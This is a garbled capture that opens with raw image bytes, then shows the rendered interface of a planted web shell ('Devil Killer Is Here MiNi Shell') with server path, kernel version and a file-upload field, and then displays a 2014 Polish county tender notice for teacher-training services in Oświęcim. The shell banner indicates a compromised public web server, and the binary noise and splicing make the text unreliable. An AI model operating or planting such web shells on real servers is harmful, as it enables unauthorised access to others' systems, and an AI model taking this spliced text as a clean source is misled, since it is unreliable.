JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141201/248703-N-2014.html

<p class="kh_header"><b>Oświęcim: Usługi szkoleniowe  w ramach Projektu Wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie oświęcimskim</b><br>
<b>Numer ogłoszenia: 248703 - 2014; data zamieszczenia: 01.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Oświęcimski - Starostwo Powiatowe w Oświęcimiu , ul. Wyspiańskiego 10, 32-602 Oświęcim, woj. małopolskie, tel. (033) 8449600, faks (033) 8449619.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe  w ramach Projektu Wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie oświęcimskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja form doskonalenia nauczycieli oraz dyrektorów (zorganizowanie i przeprowadzenie cyklu warsztatów, wykładów,  konsultacji grupowych) dla uczestników projektu Wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie oświęcimskim współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet III. Wysoka jakość systemu oświaty, Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół System doskonalenia nauczycieli oparty na ogólnodostępnym, kompleksowym wspomaganiu szkół CZŁOWIEK - NAJLEPSZA INWESTYCJA. Zamówienie dotyczy wspomagania 30 szkół i 2 przedszkoli z  powiatu oświęcimskiego. Głównym celem projektu jest wzrost jakości kształcenia w szkołach i przedszkolach w powiecie poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli i nauczycielek. Formy doskonalenia nauczycieli realizowane będą w następujących placówkach (sale zostaną udostępnione bezpłatnie przez niniejsze placówki).
Szkoły 1.Szkoła Podstawowa im. Aleksandra Kamińskiego w Smolicach, Smolice 2,32-640 Zator 2.Zespół Szkół Zawodowych Towarzystwa Salezjańskiego,Jagiełły 10,32-600	Oświęcim, 3.Powiatowy Zespól Nr 2 SOMSiT, Bema 8	32-602	Oświęcim, 4.ZSP-G w Piotrowicach, Gimnazjum nr 2, Andrychowska 222	32-641	Piotrowice, 5.Publiczna Szkoła Podstawowa w ZSO w Podolszu, Zatorska 37		Podolsze, 32-641	Przeciszów, 6.Gimnazjum w Zespole Szkół im. M. Konopnickiej w Graboszycach, Graboszyce 125, 32-640 Zator, 7.Szkoła Podstawowa im. A. Mickiewicza w Zatorze, Kongresowa 11, 32-640	Zator, 8.Zespół Szkolno-Przedszkolny w Witkowicach, Gimnazjum w Witkowicach, Beskidzka 98, 32-650	Witkowice, 9.	Szkoła Podstawowa im. gen. Wł. Sikorskiego w Nowej Wsi, St. Konarskiego 4, 32-651 Nowa Wieś, 10.Powiatowy Zespół Nr 10 Szkół Mechaniczno-Elektrycznych - Kęty Żwirki i Wigury 27a, 32-650 Kęty, 11.Zespół Szkolno-Przedszkolny w Bielanach, Łęcka 2, 32-651 Bielany, 12. Powiatowy Zespół nr 11 Szkół Ogólnokształcących - Kęty, Wyspiańskiego 2, 32-650 Kęty, 13.Zespół Szkolno-Przedszkolny nr 1 w Osieku 
Przedszkole Publiczne, Główna 123, 32-608 Osiek, 14.	Zespół Szkolno-Przedszkolny nr 1 w Osieku, Szkoła Podstawowa, Główna 123, 32-608	Osiek, 15. Gimnazjum nr 2 im. Marii Bobrzeckiej w Brzeszczach, Lipowa 3	32-620 Brzeszcze, 16.Zespół Szkolno-Przedszkolny nr 6 w Jawiszowicach Szkoła Podstawowa, Kusocińskiego 1, 32-626	Jawiszowice, 17.	Zespół Szkolno-Przedszkolny w Harmężach Szkoła Podstawowa	Borowskiego 30, 32-600	Oświęcim, 18.Miejskie Gimnazjum nr 4 - Oświęcim, Wyzwolenia 3, 32-600	Oświęcim, 19.Szkoła Podstawowa z Oddziałami Integracyjnymi Nr 4  - Oświęcim	Śniadeckiego 26,32-600	Oświęcim, 20.Miejskie Gimnazjum Nr 3 w Oświęcimiu	Ignacego Krasickiego 16, 32-600 Oświęcim, 21.	Powiatowy Zespól nr 6 Szkół zawodowych i Ogólnokształcących w Brzeszczach, Kościuszki 1, 32-620	Brzeszcze, 22.Powiatowy Zespól Nr 5 Szkół Budowlanych w Oświęcimiu	Obozowa 31, 32-600 Oświęcim, 23.Powiatowy Zespół Nr 4 Szkól Ekonomiczno-Gastronomicznych w Oświęcimiu, Obozowa 39, 32-600 Oświęcim, 24.	Szkoła Podstawowa nr 11 w Oświęcimiu,	Słowackiego 2a,32-600	Oświęcim, 25.Gimnazjum Gminne nr 1 im. mjr. Piotra Szewczyka w Rajsku, Edukacyjna 11, 32-600 Oświęcim,26.	Samorządowy Zespół Szkół w Bobrku im. kard. Adama Stefana Sapiehy w Bobrku	Nadwiślańska 9	32-661Bobrek, 27.Gminne Gimnazjum nr 2 im. Komisji Edukacji Narodowej w Zaborzu	Jezioro 2, 32-600	Oświęcim, 28.Samorządowy Zespół Szkół w Gorzowie im. Marii Konopnickiej, Szkolna 3, Gorzów 32-660 Chełmek, 29.	Miejskie Gimnazjum nr 2 im. Łukasza Górnickiego w Oświęcimiu, Olszewskiego 2a, 32-602 Oświęcim, 30.Szkoła Podstawowa w Polance Wielkiej, Długa 14	32-607 Polanka Wielka - Przedszkola:
1.Zespół Szkolno-Przedszkolny nr 1 w Osieku  ul Główna 123 32-608 Osiek
2.Samorządowa Placówka Wychowania Przedszkolnego w Witkowicach ul. Dworska 46 32-650 Witkowice
UWAGA! - harmonogram poszczególnych form doskonalenia oraz program warsztatu - wykładu będzie ustalony w okresie późniejszym (po podpisaniu umowy), w terminach uzgodnionych bezpośrednio z każdą placówką oświatową w oparciu o deklaracje uczestników projektu, - zajęcia odbywać się będą w dni powszednie popołudniami bądź w weekendy (sobota i-lub niedziela) pod warunkiem wyrażenia zgody przez właściwego dyrektora szkoły, przedszkola oraz nauczycieli, - warsztaty-wykłady i konsultacje grupowe z tej samej tematyki mogą odbywać się równolegle dla kilku placówek w tym samym dniu,- warsztaty-wykłady nie mogą być krótsze niż 5 godz. dydaktycznych dziennie dla danej grupy,- liczba uczestników-uczestniczek w każdej grupie, dla której prowadzona będzie określona forma doskonalenia nauczycieli-lek- oraz dyrektorów-rek wynikać będzie z ilości zrekrutowanych do projektu uczestników-czek z danej placówki-szkoły. Szacuje się, iż liczebność grup:warsztatowych/wykłady nie będzie przekraczać 20 osób, - konsultacji grupowych  będzie ok. 25 osób, - liczba uczestników/uczestniczek w projekcie - max. 640 osób, każda z osób powinna otrzymać wsparcie w postaci: - warsztaty-wykłady (32 placówki oświatowe, tj. 32 grupy x 60 godzin = 1.920 godzin dydaktycznych) - każdy uczestnik będzie uczestniczyć w 60 godzinach warsztatach/wykładach z dwóch tematów form doskonalenia. W sumie na jednego uczestnika przypada 60 godz., gdzie przez jedną godzinę należy rozumieć 45 minut gdzie przez: warsztaty -  należy rozumieć każde aktywne metody szkoleniowe, angażujące uczestników w różnego rodzaju ćwiczenia, gry, symulacje lub inne kształtowanie postaw uczestników. Zakłada się, że część warsztatowa z jednej tematyki powinna trwać 20 godz. dydaktycznych. wykłady - należy rozumieć spotkania nauczycieli, które mają na celu zwiększenie kompetencji uczestników w zakresie tematyki objętej wspomaganiem. Zakłada się, że część wykładowa z jednej tematyki powinna trwać 10 godz. dydaktycznych. -konsultacje grupowe  (32 placówki x 20 godzin = 640 godzin dydaktycznych)-  to spotkania grupowe nauczycieli (grupa do 25 osób) z ekspertem z danej tematyki, podczas których nauczyciele mogą podzielić się swoimi wątpliwościami. Każdy uczestnik będzie uczestniczyć w konsultacjach grupowych z dwóch tematów form doskonalenia po 10 godzin zegarowych z każdego tematu. W sumie na jednego uczestnika przypada 20 godzin,  gdzie przez jedną godzinę należy rozumieć 60 minut. 
1. Tematyka form doskonalenia w ramach Rocznych Planów Wspomagania:
Zespół Szkół Podstawowo-Gimnazjalnych w Przeciszowie Podlesiu, Temat 1. Uczeń - aktywny uczestnik procesu uczenia się. Temat 2: Rodzice są partnerami szkoły.	Zespół Szkół Podstawowo-Gimnazjalnych w Piotrowicach. Temat 1:Techniki uczenia się i metody motywujące do nauki. Temat 2: Uczeń - aktywny uczestnik procesu uczenia się. Zespół Szkół Zawodowych Towarzystwa Salezjańskiego w Oświęcimiu
Temat 1: OCENIANIE KSZTAŁTUJĄCE. Temat 2:Projekt edukacyjny w szkole. 	
Szkoła Podstawowa w Smolicach - Temat 1: OCENIANIE KSZTAŁTUJĄCE. Temat 2: Techniki uczenia się i metody motywujące do nauki. Zespół Szkół Ogólnokształcących w Zatorze -Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny? Temat 2:	Techniki uczenia się i metody motywujące do nauki. Zespół Szkół im. M. Konopnickiej w Graboszycach - Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny?	Temat 2: Techniki uczenia się i metody motywujące do nauki. Zespół Szkół Ogólnokształcących w Podolszu Publiczna Szkoła Podstawowa -Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny? Temat 2: PRACA Z UCZNIEM MŁODSZYM. 	Powiatowy Zespół Nr 2 SOMSiT w Oświęcimiu - Temat 1:Techniki uczenia się i metody motywujące do nauki. Temat 2: Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny internet.  Zespół Szkolno-Przedszkolny w Witkowicach, Gimnazjum w Witkowicach -Temat 1:Ocenianie kształtujące. Temat 2: Efektywna organizacja pracy zespołów nauczycielskich. Samorządowa Placówka Wychowania Przedszkolnego w Witkowicach-Temat 1:	Ocenianie kształtujące. Temat 2: Efektywna organizacja pracy zespołów nauczycielskich. Szkoła Podstawowa im. gen. Wł. Sikorskiego w Nowej Wsi - Temat 1:Ocenianie kształtujące. Temat 2: Budowa koncepcji pracy szkoły. Powiatowy Zespół Nr 10 Szkół Mechaniczno-Elektrycznych - Kęty -Temat 1:Ocenienie kształtujące. Temat 2: Jak i po co prowadzić ewaluacje wewnętrzną?  Zespół Szkolno-Gimnazjalny w Bielanach-Temat 1: Ocenienie kształtujące. Temat 2: Postawy uczniowskie - jak je kształtować? Powiatowy Zespół nr 11 Szkół Ogólnokształcących - Kęty-Temat 1: Praca z uczniem zdolnym. Temat 2: Praca z uczniem ze specjalnymi potrzebami edukacyjnymi. Zespół Szkolno-Przedszkolny nr 1 w Osieku Przedszkole Publiczne -Temat 1: Praca z uczniem młodszym/ praca z dzieckiem młodszym w przedszkolu. Temat 2: Praca z uczniem ze specjalnymi potrzebami edukacyjnymi. Zespół Szkolno-Przedszkolny nr 1 w Osieku Szkoła Podstawowa - Temat 1: Praca z uczniem ze specjalnymi potrzebami edukacyjnymi. Temat 2: Efektywna organizacja pracy zespołów nauczycielskich. 
Gimnazjum nr 2 im. Marii Bobrzeckiej w Brzeszczach - Temat 1: Uczeń - aktywny uczestnik procesu uczenia się. Temat 2: Szkoła promuje wartość edukacji.
Zespół Szkolno- Przedszkolny Nr 6 w Jawiszowicach - Temat 1: Praca z uczniem młodszym. Temat 2: Praca z uczniem ze specjalnymi potrzebami edukacyjnymi.
Zespół Szkolno- Przedszkolny w Harmężach - Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny? Temat 2: Praca z uczniem o specjalnych potrzebach edukacyjnych. Miejskie Gimnazjum nr 4 w Oświęcimiu - Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny? Temat 2:Techniki uczenia się i metody motywujące do nauki oraz  Uczeń - aktywny uczestnik procesu uczenia się. Szkoła Podstawowa z Oddziałami Integracyjnymi Nr 4 w Oświęcimiu - Temat 1: Uczeń - aktywny uczestnik procesu uczenia się. Temat 2: Nauczyciel +45. Miejskie Gimnazjum Nr 3 im. Klementyny Tańskiej - Hoffmanowej w Oświęcimiu - Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny ? Temat 2: Ocenianie kształtujące. Powiatowy Zespół nr 6 Szkół Zawodowych i Ogólnokształcących w Brzeszczach - Temat 1: Wspieranie pracy wychowawców klas- bezpieczna szkoła. Temat 2: Efektywna organizacja pracy zespołów nauczycielskich. Powiatowy Zespół nr 5 Szkół Budowlanych w Oświęcimiu - Temat 1: Jak pomóc uczniowi osiągnąć sukces edukacyjny ? Temat 2: Współpraca szkoły ze środowiskiem lokalnym. Gimnazjum Gminne nr 1 im. mjr. Piotra Szewczyka w Rajsku - Temat 1: WSPIERANIE PRACY WYCHOWAWCÓW KLAS. - BEZPIECZNA SZKOŁA. Temat 2: JAK POMÓC UCZNIOWI OSIĄGNĄĆ SUKCES EDUKACYJNY. Miejskie Gimnazjum nr 2 im. Komisji Edukacji Narodowej w Zaborzu - Temat 1: JAK POMÓC UCZNIOWI OSIĄGNĄĆ SUKCES EDUKACYJNY. Temat 2: RODZICE SĄ PARTNERAMI SZKOŁY. Miejskie Gimnazjum nr 2 im. Łukasza Górnickiego w Oświęcimiu - Temat 1: WSPIERANIE PRACY WYCHOWAWCÓW KLAS - BEZPIECZNA SZKOŁA. Temat 2: PRACA Z UCZNIEM ZE SPECJALNYMI POTRZEBAMI EDUKACYJNYMI. Powiatowy Zespół Nr 4 Szkól Ekonomiczno-Gastronomicznych w Oświęcimiu - Temat 1: WSPIERANIE WYCHOWAWCÓW KLAS - BEZPIECZNA SZKOŁA. Temat 2: WSPÓŁPRACA SZKOŁY ZE ŚRODOWISKIEM LOKALNYM. Samorządowy Zespół Szkół w Bobrku - Temat 1: WSPÓŁPRACA NAUCZYCIELI W PROWADZENIU PROCESÓW EDUKACYJNYCH. Temat 2: PRACA Z UCZNIEM ZE SPECJALNYMI POTRZEBAMI EDUKACYJNYMI. Samorządowy Zespół Szkół w Gorzowie - Temat 1: JAK POMÓC UCZNIOWI OSIĄGNĄĆ SUKCES EDUKACYJNY? Temat 2: PRACA Z UCZNIEM MŁODSZYM. Szkoła Podstawowa nr 11 w Oświęcimiu - Temat 1: OCENIANIE KSZTAŁTUJĄCE. Temat 2: PRACA Z UCZNIEM MŁODSZYM. Szkoła Podstawowa w Polance Wielkiej - Temat 1: PRACA Z UCZNIEM MŁODSZYM. Temat 2: JAK I PO CO PROWADZIĆ EWALUACJE WEWNĘTRZNĄ?
2.Wymagania  dotyczące prowadzenia form doskonalenia: Zapewnienie trenerów, szkoleniowców, wykładowców, konsultantów, ekspertów, specjalistów niezbędnych do prawidłowego wykonania przedmiotu zamówienia biorąc pod uwagę, iż warsztaty-wykłady  i konsultacje grupowe z tej samej tematyki mogą odbywać się równolegle dla kilku grup-placówek w tym samym dniu. Dostosowanie programów warsztatów/wykładów i konsultacji grupowych zgodnie z wytycznymi Ośrodka Rozwoju Edukacji (ORE), przy uwzględnieniu zaleceń SORE i potrzeb szkół wypracowanych na etapie diagnozy. Wydanie uczestnikom projektu materiałów szkoleniowo - promocyjnych: teczki, długopisy, notatniki, które zostaną przekazane przez Zamawiającego. Materiały szkoleniowo-promocyjne powinny być rozdane po jednej szt. każdemu uczestnikowi na pierwszych zajęciach warsztatowych-wykładzie.
Zachowanie w tajemnicy wszelkich danych osobowych uczestników projektu, do których Wykonawca będzie miał dostęp w związku z  realizacją zamówienia. Punktualnego rozpoczynania i kończenia zajęć (zgodnie z harmonogramem). Opracowanie wraz z Szkolnymi Organizatorami Rozwoju Edukacji (SORE) dokumentacji ewaluacyjnej zamówienia: testów (pre, post), ankiet oceniających itp. oraz przeprowadzenia ich podczas warsztatów-wykładów i konsultacji grupowych. Opracowanie i przekazanie materiałów szkoleniowych-podręczników niezbędnych do realizacji warsztatów-wykładów i konsultacji grupowych z każdego tematu form doskonalenia w ramach RPW, które wybrała grupa-placówka. Zamawiający dopuszcza różnego rodzaju formy przekazania uczestnikom materiałów szkoleniowych np. druk, wersja elektroniczna (płyta CD, pendrive), publikacja książkowa. Na wszystkich materiałach, które otrzymają uczestnicy szkolenia, należy zamieścić odpowiednie logo Programu Operacyjnego Kapitał Ludzki oraz Logo Unii Europejskiej, wraz z informacją o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Koszt powielenia materiałów szkoleniowych niezbędnych do realizacji zamówienia jest po stronie Wykonawcy. Wykonawca zobowiązany jest w miejscu prowadzenia zajęć umieszczać informacje, że warsztat-wykłady i konsultacje grupowe są realizowane w ramach projektu pn. Wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie oświęcimskim - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Wykonawca zobowiązany jest informować uczestników projektu podczas warsztatów-wykładów i konsultacji grupowych o współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz prowadzić zajęcia zgodnie z zasadą równych szans kobiet i mężczyzn, stosować język równościowy. Wykonawca zobowiązany jest do prowadzenia dokumentacji z przebiegu warsztatów i konsultacji grupowych, składającej się z:- list obecności na zajęciach w raz z potwierdzeniem korzystania z cateringu zawierających min.: temat szkolenia, termin, imię, nazwisko i podpis uczestnika szkolenia oraz podpis potwierdzający korzystanie z cateringu. - list potwierdzających odbiór materiałów szkoleniowych zawierających min.: rodzaj wydawanego materiału szkoleniowego, termin odbioru materiałów szkoleniowych,  imię, nazwisko i podpis uczestnika projektu,- list potwierdzających odbiór materiałów szkoleniowo-promocyjnych zawierających min.: rodzaj wydawanego materiału szkoleniowo-promocyjnego, termin odbioru materiałów imię, nazwisko i podpis uczestnika projektu,-  dziennika zajęć: termin szkoleń; liczbę uczestników obecnych i nieobecnych podczas zajęć, tematykę, podpis prowadzącego, - testów, ankiet ewaluacyjnych, - rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, zawierającego: numer, imię i nazwisko oraz numer PESEL uczestnika szkolenia,- ksero wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji,- list potwierdzających odbiór zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, zawierających min.: rodzaj wydawanego dokumentu, imię, nazwisko i podpis uczestnika. Wszystkie opracowane przez Wykonawcę materiały muszą być sporządzone w  języku polskim  i zawierać logotypy Unii Europejskiej i Zamawiającego oraz informację o współfinansowaniu obowiązujące w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 znajdujące się na stronie internetowej: www.efs.gov.pl/ZPFE/Strony/Logo.aspx. Wykonawca musi zapewnić niezbędne środki techniczne do przeprowadzenia warsztatu/wykładów oraz  konsultacji grupowych. Podczas warsztatów/wykładów przewidziano usługę cateringową, którą zapewnia Zamawiający. Zamawiający zastrzega sobie prawo do kontroli pracy Wykonawcy na każdym jego etapie. Wykonawca ponosi odpowiedzialność za merytoryczną realizację form doskonalenia nauczycieli
3. Dodatkowe informacje zawarte zostały we wzorze umowy - stanowiący Załącznik nr 5 do  SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku udziału w postępowaniu, należy wykazać: 
że Wykonawca posiada uprawnienia do wykonywania działalności związanej z doskonaleniem zawodowym nauczycieli stosownie do przepisów Rozporządzenia Ministra Edukacji Narodowej z dnia 19 listopada 2009 r. w sprawie placówek doskonalenia nauczycieli (Dz.U., Nr 200, poz. 1537, ze zmianami). Publiczna placówka doskonalenia nauczycieli musi posiadać akt założycielski, o którym mowa w § ust. 1 w/w Rozporządzenia. Niepubliczna placówka doskonalenia nauczycieli musi posiadać wpis do ewidencji prowadzonej przez samorząd województwa właściwy ze względu na siedzibę placówki doskonalenia zgodnie z § 24 ust. 1 w/w Rozporządzenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku udziału w postępowaniu, należy wykazać: 
że Wykonawca wykonał lub wykonuje (w przypadku świadczeń okresowych lub ciągłych) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej:
- jedno zamówienie polegające na przeprowadzeniu form doskonalenia (wykłady/warsztaty/ konsultacje grupowe/konferencje/szkolenie) o wartości brutto nie mniejszej niż 200.000,00 zł, w którym uczestniczyło co najmniej 350 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku udziału w postępowaniu, należy wykazać: 
że Wykonawca będzie dysponował osobami zdolnymi do wykonania zamówienia tj.: minimum 15 osobami zdolnymi do wykonania zamówienia, z których każda spełnia następujące wymagania:
- posiada wykształcenie wyższe magisterskie 
- posiada doświadczenie w realizacji warsztatów/wykładów/konsultacji grupowych dla nauczycieli w wymiarze min. 300 h w ostatnich 3 latach 
- posiada doświadczenie w pracy na stanowisku pedagogicznym w szkole lub innej oświatowej jednostce organizacyjnej oraz co najmniej stopień awansu zawodowego nauczyciela dyplomowanego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku udziału w postępowaniu, należy wykazać: 
że Wykonawca będzie dysponował osobami zdolnymi do wykonania zamówienia tj.: minimum 15 osobami zdolnymi do wykonania zamówienia, z których każda spełnia następujące wymagania:
- posiada wykształcenie wyższe magisterskie 
- posiada doświadczenie w realizacji warsztatów/wykładów/konsultacji grupowych dla nauczycieli w wymiarze min. 300 h w ostatnich 3 latach 
- posiada doświadczenie w pracy na stanowisku pedagogicznym w szkole lub innej oświatowej jednostce organizacyjnej oraz co najmniej stopień awansu zawodowego nauczyciela dyplomowanego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
